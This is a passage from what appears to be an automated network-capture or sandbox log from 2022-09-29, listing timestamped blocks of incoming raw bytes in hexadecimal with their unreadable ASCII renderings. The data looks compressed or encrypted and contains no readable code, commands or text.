                                                                                                                                                    2022-09-29 12:59:22 UTC31457INData Raw: 42 30 93 c2 85 c8 7d c4 e5 d0 08 fb 2e d7 29 36 58 be ac 89 0d 1b e2 a8 f9 7d 7b f9 fa 5b bd c9 45 03 0e 6f 27 67 f9 94 1a 6f 69 d6 18 3d f4 49 fa 7b a7 7b 2a 74 04 54 4f 18 47 0e 39 06 8b 4d 9e 37 9c f4 da d6 3e a9 53 9e bd 7a 0c 94 a8 db 21 3b e5 cc e7 57 59 70 75 b3 0d d9 11 f4 f9 1f 10 c6 b5 49 b7 87 29 b4 bb 4a 3a 3c b2 1c 19 15 a1 1d ff 8e e2 f1 7a 45 3d c3 bb 33 09 72 49 6a 74 52 bc b6 2f b6 9e 07 59 d8 d0 8f a8 27 22 d6 85 93 d5 e4 c1 0d 12 94 9d 0f bd 97 97 ae c8 e8 06 46 92 c9 24 57 6a 16 ac ae ce d1 c4 07 9b d6 5d 93 00 3a ad a7 a1 9a 4e 92 b3 63 d1 62 08 83 7e 9b 3e 66 d6 02 45 20 66 45 59 24 63 73 ef 33 8b ba 95 7a 10 96 4e d0 a2 81 fa 5b 33 fd 34 ce c9 b6 d1 97 4e 21 5d 44 82 67 ca d0 90 65 c5 55 9a 92 b3 28 29 ef 7c 82 12 dd 61 da 35 57 81
                                                                                                                                                    Data Ascii: B0}.)6X}{[Eo'goi=I{{*tTOG9M7>Sz!;WYpuI)J:<zE=3rIjtR/Y'"F$Wj]:Ncb~>fE fEY$cs3zN[34N!]DgeU()|a5W
                                                                                                                                                    2022-09-29 12:59:22 UTC31473INData Raw: 41 25 54 24 49 ba 3c 44 1e 56 3e be de c8 54 55 2a 7d d8 ec 80 7e 05 dd 49 53 f2 8b b0 6e ac ef 0c a8 e7 d9 76 ec 60 2c c8 2b 32 df 2e ff b6 cf f1 67 7a 0a 9d 5c c9 9e 61 a5 a3 53 88 92 81 06 ac f1 2e 53 d2 f0 01 4e ac 4c 78 ec 1c 51 19 2b f2 91 c7 6f 8c 39 e7 be e6 4e 11 8c e3 ed 83 c4 58 a8 7b 5c 30 7d c3 ae 05 fd 65 91 62 96 97 2e 42 3f 2b 94 a6 53 5c 23 93 cd 32 84 96 a3 dc 63 29 f5 2e d9 a5 d9 4a c3 fb f1 21 ef c5 84 93 cd f9 4c 83 70 c2 69 56 73 c3 be a4 28 a3 29 81 f9 5e 1a 94 6e 99 a7 49 0a d2 b6 2a f4 c8 05 9c ce 6a ab 8d 16 f3 df 6d 5b 6a ad 80 3b 64 1c 9e 4c 85 fa f6 36 c9 37 a1 f2 a4 6e 22 43 53 7d 77 cc 82 8d ca 44 df 2a 1e 99 62 be bf 78 bd c9 e4 9b 0f 54 63 fb be ac e9 b4 e6 42 c5 0c a5 5d 73 e6 5f c9 be 84 4e 26 4c de 03 10 53 38 5a cb ea
                                                                                                                                                    Data Ascii: A%T$I<DV>TU*}~ISnv`,+2.gz\aS.SNLxQ+o9NX{\0}eb.B?+S\#2c).J!LpiVs()^nI*jm[j;dL67n"CS}wD*bxTcB]s_N&LS8Z
                                                                                                                                                    2022-09-29 12:59:22 UTC31489INData Raw: 89 96 3d 6c 1c 5c db 2b d9 6a 0e 37 cb d6 08 76 6b 54 26 b1 fe ab 4a 99 ba 14 42 66 a8 9e c9 5f 47 8b f7 40 73 cd f3 89 28 18 4a cb 25 aa 7f 04 ac b3 e8 1f a0 9f 20 d4 38 0e 41 49 0f 3d c8 eb 81 5e 7c cf 26 26 fe 08 b2 11 42 dc 5c 87 67 99 18 d6 fb 5a fb 72 fb 7a 5b 09 04 dd 18 a7 41 9b 21 4e 2e 90 a0 90 6f 44 ee f9 68 c8 1f 8c 16 20 c4 1f 0a ca c4 4e b1 32 6f 2b 72 d4 96 0c ec 7f 28 54 16 c1 af 15 27 3f c8 b6 ea 97 bd d5 73 81 47 a6 27 18 79 51 d9 db 40 d8 11 9e cc 30 1f b4 55 d2 8c b2 3e 45 15 ae e6 0d f0 25 4d 14 cf 45 ba 24 35 47 08 9b c1 34 b5 c5 71 45 6a e4 91 1e 21 d4 52 fc 69 d0 b5 c3 f2 17 f9 2b 8f 00 a2 bc 5a 29 50 39 eb 7d 7a eb 5c b4 50 8a 27 00 57 33 3b 9f 6f 63 72 88 e6 20 0b b8 69 f8 77 a9 b1 59 96 6f e7 72 d8 d7 2f fb 63 38 da 96 61 08 29
                                                                                                                                                    Data Ascii: =l\+j7vkT&JBf_G@s(J% 8AI=^|&&B\gZrz[A!N.oDh N2o+r(T'?sG'yQ@0U>E%ME$5G4qEj!Ri+Z)P9}z\P'W3;ocr iwYor/c8a)
                                                                                                                                                    2022-09-29 12:59:22 UTC31505INData Raw: 7b 38 bf 04 3d c4 ef 96 6b 60 03 8b 51 f2 68 00 0a e3 94 56 b6 40 ca 93 1d 51 fd d1 8c 97 14 a1 bb 57 1c 80 5e 04 4b 10 24 0b a3 83 35 2a 0c 01 e2 a0 eb cc 49 4c 84 be a7 f7 50 b5 71 8b ce 89 6c 90 57 ac c3 d2 5b 80 a1 a2 08 5d 23 c0 77 7b 96 15 0b 42 94 1e bc 85 92 35 00 4d e5 28 5f 51 dc 75 8e 3c 3e 2d b1 d8 91 bb 74 08 ee 7c 8f 26 07 9e 2a 2d 8a bb 28 60 39 c4 48 c7 4e 4c aa b2 60 cc cf 35 86 51 60 68 bc 3f 49 d2 54 c4 5c 16 1f 5b 34 b5 c1 a0 cf 66 85 92 cc 27 1d 76 00 f5 06 5c 00 86 7d b2 40 ae 91 81 e0 d7 a4 eb 8a bf 87 df 60 ee 84 6b 94 cc c0 77 1f ae 08 67 be 48 e9 7f 2b 7d 41 85 ee b1 5e 6e 93 b9 7b 1b 95 09 1f b0 a7 52 80 b7 85 fd 9c e5 55 25 ff 14 55 d3 af 59 bb c3 2c 07 b0 e3 06 09 ba 5d bb 3b d6 80 c6 50 59 ea 8a bb ee 4e 0a db df ca bb f5 38
                                                                                                                                                    Data Ascii: {8=k`QhV@QW^K$5*ILPqlW[]#w{B5M(_Qu<>-t|&*-(`9HNL`5Q`h?IT\[4f'v\}@`kwgH+}A^n{RU%UY,];PYN8
                                                                                                                                                    2022-09-29 12:59:22 UTC31521INData Raw: 42 e9 bc d5 aa a5 3e 8b 49 e4 8c bd 0c a8 29 6d f8 d9 3b e5 af b8 95 c5 a1 0e 3a 18 31 53 31 a7 b6 e4 15 09 18 55 36 c4 de 0b 1b 70 f6 7a c9 82 54 36 d0 2a 7f e5 13 8b 24 4a 89 fb 59 0d c8 e6 80 c7 4a 03 cf 2e ad 00 cb 64 71 c6 17 48 6f 6c 68 1e 64 d6 f1 cd 88 25 c9 06 1b 20 f0 b3 e5 66 4f 40 fa d6 4d 2f b3 6d f1 4e dd fc 88 75 df ef 8a 94 63 5b 04 3f be fa 4c d2 d9 59 c0 38 0c 6c 7b 00 d6 1d 0f 2f de 0d 72 c3 33 e9 01 95 6d a4 95 0d bf 4a 1a 69 1e e5 1d 59 d7 f6 cb 1e 84 21 d4 6e 37 b4 77 8d 12 ad 73 03 d0 48 60 e7 4a 9c 6a f8 81 9c 22 53 09 61 11 ba 4b 3c 12 b1 c5 0c eb 7b 5f 34 01 d6 cd 9a 06 a2 8f 22 41 58 af d2 c1 6e 4c 1a 84 f3 1f ad aa 7f 52 3a 1b 5e ba 84 69 14 24 79 f0 e2 29 6d 56 35 17 68 2d 0d bd da 4f 03 3d cd 96 09 10 3f 60 26 2b b5 71 4c 5a
                                                                                                                                                    Data Ascii: B>I)m;:1S1U6pzT6*$JYJ.dqHolhd% fO@M/mNuc[?LY8l{/r3mJiY!n7wsH`Jj"SaK<{_4"AXnLR:^i$y)mV5h-O=?`&+qLZ
                                                                                                                                                    2022-09-29 12:59:22 UTC31537INData Raw: bf 32 d4 62 c8 60 5b 81 95 e4 48 f7 24 5d 35 b5 69 96 55 3c 04 53 05 50 14 29 d9 1b a9 a7 5d 5a 97 2c d8 0b b4 17 94 76 7d 37 fe 10 7f 93 a5 5c 69 47 9f 04 11 a9 6c f7 84 be d1 50 5b f3 47 de f3 3a 5d 9e 9a e9 1c 18 ba eb 5e c0 f7 9e 2a 52 7f 8a 51 ce 25 e9 89 cb 10 9f a7 ec c9 04 51 5f fa 67 73 39 18 28 77 ed 46 12 9d c1 af 05 e8 7e 36 f5 17 cc 80 32 7f 36 ab 44 7a a8 da ba dc c1 f3 b9 07 27 c1 66 40 6a 7f 5b 70 2a 36 b5 3f 58 6b 67 d1 ab 6b 71 3d bd cd d7 28 42 e0 9c 08 3e f9 e4 e9 8d 1b 86 79 39 7c 6d d3 4a 6c 0a 30 fb ca 4e 45 cf 41 67 63 32 34 5f b8 ea 0e 57 ed f8 59 26 df 49 d7 30 1a 2e 4c bb 65 cd 00 bb 0a 4e 39 83 78 40 32 17 83 a3 ce 22 e5 8f 63 33 60 2e f3 88 aa 78 2a 30 6c 7a 2c 56 ee 5d ef 44 00 54 28 ae 58 94 66 15 f0 5e 37 26 c3 3c 3b 33 24
                                                                                                                                                    Data Ascii: 2b`[H$]5iU<SP)]Z,v}7\iGlP[G:]^*RQ%Q_gs9(wF~626Dz'f@j[p*6?Xkgkq=(B>y9|mJl0NEAgc24_WY&I0.LeN9x@2"c3`.x*0lz,V]DT(Xf^7&<;3$
                                                                                                                                                    2022-09-29 12:59:22 UTC31553INData Raw: 05 f6 d2 6c b8 bf 70 20 30 2e c7 65 cc ad 02 aa d0 06 87 9b 06 3a ef bd 45 8e c9 25 8b 5f 2a 36 a9 6c 10 65 4c 00 93 b1 a1 23 80 b6 31 b0 79 e8 8f 7c fc af d3 34 e2 d9 99 77 5f b0 5d 93 aa df 0e 5c 60 ec 60 8e 41 0d 02 a8 04 23 ac 7a 6a d5 27 d1 7f d7 de 8e 6c 34 2c 1c de 1c 3d 73 40 f6 2f 5b a1 28 ef 84 5d 5d c9 fe 8d 0e cd 16 97 18 12 95 cf 4b 3d 4e 77 6f 1b 74 34 38 3c 0b ed 41 7e e0 35 64 37 8c 95 f3 60 15 57 55 67 27 32 14 4e 3a 9e d6 23 ed 65 2a 69 97 03 47 99 48 c7 dd 4e 08 28 22 ee 2b 2c e8 aa 80 b1 ad 0f 59 61 38 38 14 8b ad 43 2e d7 cc 28 e5 92 fe 0b e1 9b 08 3f 05 4a 36 fd 02 4a d5 64 06 dd b0 fd d4 91 38 fd 30 19 54 ff 6c e3 97 dc 7d dc 9d e3 cd 92 9d ae 28 e9 44 29 2b 8e d3 c1 1d 27 31 3d 51 31 71 9d 55 0b cc 5d e6 53 6f bb de 25 b4 d6 2e 7c
                                                                                                                                                    Data Ascii: lp 0.e:E%_*6leL#1y|4w_]\``A#zj'l4,=s@/[(]]K=Nwot48<A~5d7`WUg'2N:#e*iGHN("+,Ya88C.(?J6Jd80Tl}(D)+'1=Q1qU]So%.|
                                                                                                                                                    2022-09-29 12:59:22 UTC31569INData Raw: 41 2a 3c dc 7a 15 3e f3 41 53 b1 46 18 4b 88 d3 8d a7 11 03 de ff 88 04 bd 38 7b 8a e8 d2 d9 fd 0e fe 3f a9 9a b7 bd dd f2 fb 41 51 f5 4e 53 8a 27 a9 30 a0 2b d8 d8 b4 c6 0e b3 1a a5 a9 85 1f e3 2c 00 e8 f3 69 b8 7f 77 ec fe 12 dd db 3d ed ba db bb 0a 81 18 28 21 56 da c7 48 c2 a9 b9 3c 84 80 69 a0 87 9b a2 c7 c0 0f ee e2 d6 0f 0e 03 86 f7 02 37 be 4f 4f f5 bb 16 a0 62 23 6b ff a1 d7 38 7c 4a e2 f4 5f 18 17 36 e6 c9 cc fa 37 32 71 91 6d 50 a9 40 99 87 53 79 d2 45 06 26 01 32 06 9d 44 4d c6 67 37 b6 21 41 fc 35 8c bb 35 b2 c2 49 46 92 3e e1 72 54 d8 e3 86 c0 e4 a2 58 69 b5 89 8d 56 89 1e 59 b3 3e 0c 1d f2 4b fa 7c e8 28 3c 8c bc ed d8 ee d3 72 76 d9 b7 b0 a0 04 08 c3 b7 ec 73 8e ac af 92 f7 a3 4c 5b 05 94 34 3f c2 1a 99 82 63 47 16 29 bc 07 d2 55 66 6e 8b
                                                                                                                                                    Data Ascii: A*<z>ASFK8{?AQNS'0+,iw=(!VH<i7OOb#k8|J_672qmP@SyE&2DMg7!A55IF>rTXiVY>K|(<rvsL[4?cG)Ufn
                                                                                                                                                    2022-09-29 12:59:22 UTC31585INData Raw: 9f d6 e8 58 7d 8d 66 52 2b af 93 9a d9 9d 77 4c 46 04 ba e7 97 34 2d 84 5a 31 5f cb 5e 47 f9 26 17 04 30 51 5a 20 7b d9 df a0 6a 07 85 cb dc 78 b9 1b b8 95 3a 4f fc c2 e1 26 0a bc 7c d8 84 85 5a c5 9c 78 bc 23 89 e3 0d 3c 01 2f 7c d1 d8 ab 95 dd 77 e8 ce d8 21 07 84 25 44 b4 34 58 fb 6e c7 fc e5 60 45 a9 fc 0f 5e 07 77 68 63 00 00 f9 56 3a a0 83 8a c9 cd 18 6f 56 68 5b 41 e5 35 c4 05 d6 9b 20 4e e3 77 f7 a2 28 87 22 1d 84 0a fd 26 07 7b e6 14 12 d0 96 eb 48 1f 23 55 a9 bd bd 38 89 b1 ec a1 d5 2d 2c ea a6 53 86 db 57 bf 89 f6 ed da 57 31 0b ed 12 9c 27 20 cd bd 19 4a 8f 7c 29 0e 50 02 0d 13 1a e8 21 a6 f2 7e 1a fd 19 0f 75 2c eb 80 62 a0 52 1c cf c3 2c 8e 00 bb f4 37 ee 92 fb 60 fd 66 92 4f 4a 19 54 84 41 75 29 04 90 f9 58 72 0c a6 71 33 3b 97 e3 42 50 1f
                                                                                                                                                    Data Ascii: X}fR+wLF4-Z1_^G&0QZ {jx:O&|Zx#</|w!%D4Xn`E^whcV:oVh[A5 Nw("&{H#U8-,SWW1' J|)P!~u,bR,7`fOJTAu)Xrq3;BP
                                                                                                                                                    2022-09-29 12:59:22 UTC31601INData Raw: 2a ef 4e 07 0d de 98 af 42 79 7e ba 9c af 91 d8 d5 6e 4c cf 0e d3 ec f8 1b 0f e6 f7 35 2d 6b ef 6b 7b ac 6f 53 b1 d0 90 c6 d4 15 b8 9c 56 17 c3 a4 b0 6e e1 d3 42 86 8d 5e 98 79 27 a9 e1 1e 6e 77 40 4d cf b2 0d 76 15 fc b3 1a a8 57 41 39 1e cb f9 f3 8d 26 7b 40 4c fa c7 8c ed 1c 3d c8 4f f6 a9 06 ef 17 31 ba ea 23 07 81 ec fa c7 7e 49 ee 34 32 b6 10 36 6a c3 92 04 63 c4 1f 67 d2 dc c8 80 a9 e5 da e6 3e 5b 3f 42 bc a5 97 f8 4d 83 3f e6 b0 62 3b 86 bd 3a 00 80 72 82 15 b6 ef 9c 05 bd 63 8b 28 54 99 58 8c 1c 38 00 04 79 f6 b9 72 8d 98 ed b3 8b 98 7c 0b 67 be a4 81 91 bd d4 4e 4d af cb fe a5 f0 a0 1f f7 66 c6 19 ba 41 2f 24 97 11 7e f3 ec 64 b0 08 01 28 36 5e 4b 09 e1 3a 73 b2 bf 12 af 75 c5 25 4d 2e 4e 92 75 ed 3e 8c e1 d8 96 73 36 bf 4e e6 73 e7 89 8d ea 7c
                                                                                                                                                    Data Ascii: *NBy~nL5-kk{oSVnB^y'nw@MvWA9&{@L=O1#~I426jcg>[?BM?b;:rc(TX8yr|gNMfA/$~d(6^K:su%M.Nu>s6Ns|
                                                                                                                                                    2022-09-29 12:59:22 UTC31617INData Raw: 1f d6 8c 84 e1 65 e1 0d 4f 95 bf 7c fa df 6f a6 8d 49 6e cc b4 1a 26 13 0d 67 be 22 ff 96 eb 7b 42 29 7c 13 d2 92 0c 93 78 51 a1 11 f5 5c da b4 5e b7 82 20 7f 87 dc 01 e0 f6 3f 9a d1 48 da dc 46 d2 1e ec 3e ca 80 a7 39 0a 03 b7 25 8a d3 7b 1d 01 b4 69 5b 35 0d fc 83 44 24 e5 a8 a1 fb b5 71 ab 6d c4 88 18 50 22 3b bc b9 e8 0a cd d0 9d d8 fa 24 02 56 c2 da 0b 6f cb dc 03 d0 3c 73 c5 77 48 26 fc 92 2a 35 71 1e f2 04 3c 97 dc 05 1d cc 01 14 ac 35 0e 72 82 23 7b 3a c4 50 22 fe 6b 90 3c a1 65 b4 9a 71 20 e0 37 4a bb 55 9e 26 c0 ea ea b6 0c 42 66 95 8e fe 7a f4 dd 56 d1 bc be 35 2f c4 a8 70 20 47 f0 fa 2c 0c b0 37 30 32 16 9e cf bd ce 50 50 3c 42 ab 3a e6 7d b6 20 d9 ea 5d 91 72 2d 12 56 39 48 50 ce 47 aa bf 3a 5f d2 33 95 f0 cf 80 ae 00 85 88 c3 1e b4 b9 40 17
                                                                                                                                                    Data Ascii: eO|oIn&g"{B)|xQ\^ ?HF>9%{i[5D$qmP";$Vo<swH&*5q<5r#{:P"k<eq 7JU&BfzV5/p G,702PP<B:} ]r-V9HPG:_3@
                                                                                                                                                    2022-09-29 12:59:22 UTC31633INData Raw: 6f 6a 48 5f df 12 32 49 2a a9 23 61 7f 11 53 d3 4f 20 1a a1 7a 02 42 cd 9f aa f6 7b 1a f2 b1 5b 5f 19 c6 34 90 d1 66 a8 07 04 47 17 6b d6 b6 fa a6 13 b2 5d 84 9d 0f b1 7c 5c ac 86 84 0f cb 40 43 bc 45 0c 0b cc b7 0f 29 a8 de 90 4f 72 bb 69 0f 0a e2 39 69 58 89 ae 8f ce 98 29 ef 9a ae 30 9c 27 3f 22 44 74 24 ee 83 b6 11 7c 12 05 cb ca 77 a9 73 c2 ff 20 b9 cb 07 e3 3c d8 b6 d2 de 32 7e ac 69 81 45 5d fd 0c e1 64 f6 62 d6 48 ff f2 3c 84 ed 33 d9 2c 35 46 cf 26 44 5c b3 4d 18 ae 91 96 65 9c bc 5f e0 2d e7 0a 48 90 6c f3 af 9a 7d 90 73 64 92 59 83 ae c2 46 f1 80 73 5c b7 9d 58 57 18 32 91 43 0c 2f 5d ef 62 46 a4 80 e1 b6 ab 2c 29 4f 5c 61 5b de c7 ea 20 a9 21 f9 70 57 ec e8 03 b6 70 b9 cd 7e e9 3c 0a 7d a0 87 10 25 67 d4 fc 6f 50 6f e1 d2 17 42 2f 07 90 f7 d5
                                                                                                                                                    Data Ascii: ojH_2I*#aSO zB{[_4fGk]|\@CE)Ori9iX)0'?"Dt$|ws <2~iE]dbH<3,5F&D\Me_-Hl}sdYFs\XW2C/]bF,)O\a[ !pWp~<}%goPoB/
                                                                                                                                                    2022-09-29 12:59:22 UTC31649INData Raw: c0 d8 21 16 d4 37 dd f1 62 80 2a eb b2 a6 71 04 84 a7 34 a0 8c e1 45 4a de a0 ba 59 33 88 22 f4 84 04 2e 20 b6 81 15 35 b5 32 3c b2 78 16 55 df 7e f1 4c 88 93 8e 66 87 0c 9d e4 b3 41 e2 78 db 61 4b d6 64 e6 23 a8 6d 1a d1 f8 4f f7 fa 59 fa e1 b3 ad a0 6f 38 d3 91 5c 09 b4 49 01 e8 5a dc 58 fa 23 b2 0f 8b 71 de 9e 8f ab 5e 51 60 2f 9c d4 9d 72 51 17 24 08 3e 29 0d 95 a5 47 38 8e 1d a6 c3 ec 89 d5 14 27 8b d2 28 b8 c3 81 f4 0b 09 dd 6b 7b b4 a0 cf 5e 53 03 49 2f 9e 88 91 b3 98 72 94 74 79 f2 85 2d 5e 63 28 a4 69 31 dd 0f 4d 3b d0 cd 70 c6 42 aa 5a e2 4e 6c 88 55 07 76 ef f0 25 00 33 6b f8 13 9b 74 02 26 4d 37 8c a7 d6 4f 27 86 c3 95 67 13 b2 76 fe 04 b5 5e b2 5b 9a c7 15 82 59 22 b8 2b de 85 1e 72 69 fd 44 3f 0d 8e 27 9b 73 45 5e 93 3b 19 8e ab fc d3 9d 9e
                                                                                                                                                    Data Ascii: !7b*q4EJY3". 52<xU~LfAxaKd#mOYo8\IZX#q^Q`/rQ$>)G8'(k{^SI/rty-^c(i1M;pBZNlUv%3kt&M7O'gv^[Y"+riD?'sE^;
                                                                                                                                                    2022-09-29 12:59:22 UTC31665INData Raw: 39 8c 70 ee f8 63 2b 18 ac 69 8a f6 0b 1d 4b fe 69 ce 3f 54 04 98 9e 1f 5a a9 d5 d5 91 e6 b7 93 b4 53 2f ae 70 46 7a c2 79 e2 b5 a6 93 1e 6b 05 f4 c6 bc bd 17 f2 35 9a 18 56 89 ec 44 1a 2b b1 90 99 d8 bd 35 16 25 ce 33 bb 39 44 3e 9a 24 83 35 af da b7 6c de 0c 67 b4 5d 4e bf 0e f4 de 50 72 7e b1 6f 04 38 c6 a8 11 95 36 4e 94 1c 78 9e 0d 1f d5 ad 11 62 44 a5 18 86 ba e7 72 6a aa 9e d3 67 32 a4 05 61 72 ed 87 00 97 b1 5f cd bd f5 25 28 af 16 3b 6d a9 a4 fd 59 6b fa 1c 36 31 6f e9 d5 8d 61 d9 4c f9 75 7f 30 01 ff 8b dd cd 69 7b 61 85 3c b5 b7 8d 80 92 fa 09 4c c6 4c d0 0f be db 57 6e d4 f9 89 a3 4f 8c 1f dc cc 83 79 9e ce 36 0b c4 49 30 46 70 54 6e b2 b1 1d 5c 2f eb 03 ea 1c 27 53 14 4f 5e 6a bc 38 9a e2 aa 3b d2 8a e4 34 76 c0 56 27 06 e1 6e aa fd 8b 67 db
                                                                                                                                                    Data Ascii: 9pc+iKi?TZS/pFzyk5VD+5%39D>$5lg]NPr~o86NxbDrjg2ar_%(;mYk61oaLu0i{a<LLWnOy6I0FpTn\/'SO^j8;4vV'ng
                                                                                                                                                    2022-09-29 12:59:22 UTC31676INData Raw: 23 e9 26 2c 9d a3 61 14 30 3d cf 7f 09 42 6d 01 ec 13 28 4f ed 16 76 01 51 1c f7 6a f0 eb c9 48 10 9a b3 c8 04 bd 0e 4b 0c e5 cd 63 76 63 fe 4a 79 03 fd 6d 68 97 a1 55 79 2f a7 66 7b 91 84 a7 ef 6a 1f 03 f5 77 4c f7 53 0d 00 88 4f 48 1a 6e 1c 65 c3 a2 ae c5 31 50 7c 05 cf f3 12 7c 75 06 88 8d 65 2f 0f 4f f8 32 55 df ab e3 79 7c 39 ad 1a a2 0a 4d 2c 48 23 47 98 08 1d 00 37 8b 9e 1c 2e 6d ef c2 58 4d db db 3f 91 bf 53 b2 1f 79 98 df 97 f3 47 8d c7 0d 7b b0 e9 31 d8 29 f4 cb d0 3e 63 6d b4 05 50 fc 14 67 66 3f f3 b8 c2 2b 5d 44 d8 6b 3d a0 82 00 61 53 fe f2 6d b3 48 cd fd 75 5f d8 b0 1c f0 aa c2 c0 7d ce 74 94 0e 4b 8b d7 c6 1f 33 34 88 6f b6 19 86 ab 8a 26 d3 19 0e 4f f3 c6 12 52 47 a2 95 52 87 c1 c2 de 55 9c ed 50 19 78 ca 69 a4 cb 81 3d f8 e9 14 9b 1f 51
                                                                                                                                                    Data Ascii: #&,a0=Bm(OvQjHKcvcJymhUy/f{jwLSOHne1P||ue/O2Uy|9M,H#G7.mXM?SyG{1)>cmPgf?+]Dk=aSmHu_}tK34o&ORGRUPxi=Q
                                                                                                                                                    2022-09-29 12:59:22 UTC31692INData Raw: 35 47 38 95 17 d7 b7 66 b2 bf 6b ce 36 0a a3 43 ac aa cc f4 e9 41 94 50 63 fa a6 cd b8 5c f3 94 27 79 07 15 ec 21 84 ed f2 17 13 62 7c 1a 89 12 87 98 ad 56 69 f1 3e 60 2c ff 76 28 3d 94 45 7f ba 82 23 9d 56 18 b7 a8 2a 71 10 a1 b0 d1 92 71 bf f4 a9 c8 26 a4 7d 77 4a 12 5b 8a 67 af d7 4f a5 c3 0d fd 13 98 21 a6 93 b0 2b a2 0c 72 b3 26 49 ca c9 36 49 c5 94 6a 78 40 56 4e 3d 23 0d 18 d7 74 b0 86 87 07 fa 97 5d 6f 90 0d a5 50 80 ae 5f 80 14 44 63 6f 13 18 16 7f d9 94 b6 e4 26 f3 d0 be 21 ee db 48 51 73 ae 3b 9d 64 89 ce 75 e6 44 bb 89 46 5e 41 39 d8 d9 b2 d5 1c 35 84 ab f0 74 d4 3d 36 e0 be d1 78 03 4a ae bc 4f 4c 65 18 5b 7a e4 ee b6 51 3b bf 87 5e 00 02 1a 6d 98 cd 72 50 61 a6 85 53 8f 9b f8 13 bc 8b f1 e1 7b e2 2e dd fc 4a 62 98 bb 01 ae 9c 2c b8 d2 b2 dc
                                                                                                                                                    Data Ascii: 5G8fk6CAPc\'y!b|Vi>`,v(=E#V*qq&}wJ[gO!+r&I6Ijx@VN=#t]oP_Dco&!HQs;duDF^A95t=6xJOLe[zQ;^mrPaS{.Jb,
                                                                                                                                                    2022-09-29 12:59:22 UTC31708INData Raw: da e4 d7 db b6 c9 c9 bc 21 f0 b5 27 10 ad 6d bc 7f 48 76 25 79 8c c9 1f 0e e7 01 de b4 32 0e dc 5c 65 76 63 1b 3a b5 bb 01 13 b5 66 9f 2d 85 a4 f4 bd c1 9e 64 55 d8 cc b8 ae e4 f8 c3 d1 63 da f9 5b 8a dd e4 ec 10 e5 8f 7d 91 73 64 7b 30 df 99 63 7a 0c 4a 33 32 84 a2 91 a3 59 8a c7 f0 f3 39 12 39 95 45 69 03 7e 59 b8 d1 af b6 64 59 e5 68 61 9d 0e 1b a1 2a ef 09 58 c5 26 64 64 bd 18 67 dd 37 db 03 c5 21 f2 77 93 27 42 44 a5 e3 e7 d4 ea 42 fa d1 3a 46 bc 16 fc ac 3e 9b 0d 9f f6 5b a5 2b 4d fa 84 49 fd 2f bf 0e 3a 3d 6a 1b d7 98 b3 3d fa 8d a4 89 75 b2 56 2f 93 1d 68 03 f4 95 6e 71 86 e4 37 ee 50 9d cc 40 01 f9 39 c3 d1 a6 71 a8 da e6 a5 23 22 67 03 5b 59 08 45 f8 b2 d6 62 7c 24 3a b7 40 2f 47 68 d9 12 29 93 f9 6e 8b 95 5c c0 1a b2 ba 23 e3 ac c9 50 84 1b 95
                                                                                                                                                    Data Ascii: !'mHv%y2\evc:f-dUc[}sd{0czJ32Y99Ei~YdYha*X&ddg7!w'BDB:F>[+MI/:=j=uV/hnq7P@9q#"g[YEb|$:@/Gh)n\#P
                                                                                                                                                    2022-09-29 12:59:22 UTC31724INData Raw: 89 3f 4b ba d3 e4 05 4c 6d d8 f2 cb 82 f8 c9 c4 72 76 cb 73 ee 24 7e fb 41 ef 69 99 d2 04 64 46 9a 10 52 8a f9 fa e2 59 ce 03 b4 f9 0e 06 85 9c 01 10 29 7f 24 7a e0 fe f0 2b f7 1f 50 82 ca bd af f8 fe 71 76 8a 7a d3 7f f2 c4 18 88 99 cd d3 34 22 2a 28 00 a9 06 9b 53 e0 c4 c4 4a 0a 13 96 d5 05 c5 4d 02 62 59 63 a5 30 ec 32 62 ba 60 bc 81 42 21 c4 90 0e b2 41 4e 30 e6 5f a1 e3 7e 10 bf 3d 40 c2 a5 57 33 b9 02 95 3b f1 13 75 d9 75 c5 14 1a d4 7d f2 c3 52 c6 3e 10 ac 58 bf de d0 2f f6 f9 ff 02 5e 25 c7 78 f7 5f 00 e2 e9 9f 00 77 03 33 db 49 df ac 5c c8 ad b8 51 0a 63 e0 4a f3 bc 1b ad 87 75 a1 4e 75 78 1a 41 29 2d 28 be c5 f1 d0 6d 58 bc 5f 43 2b a5 2b 31 f4 54 a0 a1 20 80 e6 54 a1 ec 7e 42 96 d6 04 ad e8 c5 11 52 6d 5b a1 90 d7 40 3f 93 6a 7b 12 9f 7d cf 56
                                                                                                                                                    Data Ascii: ?KLmrvs$~AidFRY)$z+Pqvz4"*(SJMbYc02b`B!AN0_~=@W3;uu}R>X/^%x_w3I\QcJuNuxA)-(mX_C++1T T~BRm[@?j{}V
                                                                                                                                                    2022-09-29 12:59:22 UTC31740INData Raw: 7a 9a 6c 8b 0d 5e 8a 50 a8 61 25 7c 8c df ec ee eb 6e fb 47 4e f0 5a 2a b0 da 16 24 37 0d ac 51 f7 19 25 c1 a6 ca 1a f7 3a e6 76 a1 89 74 29 f4 b0 bc 01 cb b0 bf 82 58 6c 49 71 c5 47 ca d9 47 e1 96 cb 6a b2 1b 85 54 a7 88 8f 83 e6 3b c3 ab bd ac d8 f3 c3 95 92 7d ae 2b 10 3c 69 56 a3 94 65 01 88 12 83 e9 65 87 9d fa f8 ba 1e eb 91 45 8b 43 46 23 8f 69 0e 92 74 ac b3 09 2e d4 bd 30 99 2d e4 2b f2 a2 07 ed 59 47 21 5c 0d 31 6f 2b 76 9a d5 30 07 5f 17 59 70 7c 2b b3 38 39 c3 20 0b 44 b4 7e 3f 3c 59 f2 0e bf f0 90 3d 98 75 6e 53 cf 1e ed 5c a7 36 1a b7 43 61 37 6b e0 e8 a0 6f 55 83 0c 85 13 b1 cd 5d 75 5b 6d 07 44 48 2c 41 d5 57 f9 51 a3 13 e6 79 d7 9c 6a 24 91 72 2c 54 b4 22 34 4c cb 2a c2 d1 3d 03 6f 29 aa f6 b2 15 78 b7 5b bb 0b 28 74 3f ed b4 ab 4a 1f 68
                                                                                                                                                    Data Ascii: zl^Pa%|nGNZ*$7Q%:vt)XlIqGGjT;}+<iVeeECF#it.0-+YG!\1o+v0_Yp|+89 D~?<Y=unS\6Ca7koU]u[mDH,AWQyj$r,T"4L*=o)x[(t?Jh
